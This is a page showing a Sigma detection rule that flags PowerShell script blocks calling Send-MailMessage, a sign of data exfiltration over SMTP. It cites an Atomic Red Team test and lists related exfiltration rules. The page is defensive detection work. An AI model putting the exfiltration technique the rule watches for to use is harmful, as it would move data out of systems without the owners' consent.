Powershell Exfiltration Over SMTP
Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.
Sigma rule (View on GitHub)
1title: Powershell Exfiltration Over SMTP
2id: 9a7afa56-4762-43eb-807d-c3dc9ffe211b
3status: test
4description: |
5 Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.
6 The data may also be sent to an alternate network location from the main command and control server.
7references:
8 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-5---exfiltration-over-alternative-protocol---smtp
9 - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/send-mailmessage?view=powershell-7.4
10 - https://www.ietf.org/rfc/rfc2821.txt
11author: frack113
12date: 2022-09-26
13tags:
14 - attack.exfiltration
15 - attack.t1048.003
16logsource:
17 product: windows
18 category: ps_script
19 definition: 'Requirements: Script Block Logging must be enabled'
20detection:
21 selection:
22 ScriptBlockText|contains: 'Send-MailMessage'
23 filter:
24 ScriptBlockText|contains: 'CmdletsToExport'
25 condition: selection and not filter
26falsepositives:
27 - Legitimate script
28level: medium
References
Related rules
- Data Exfiltration with Wget
- PowerShell ICMP Exfiltration
- Suspicious DNS Query with B64 Encoded String
- Suspicious Outbound SMTP Connections
- Suspicious WebDav Client Execution Via Rundll32.EXE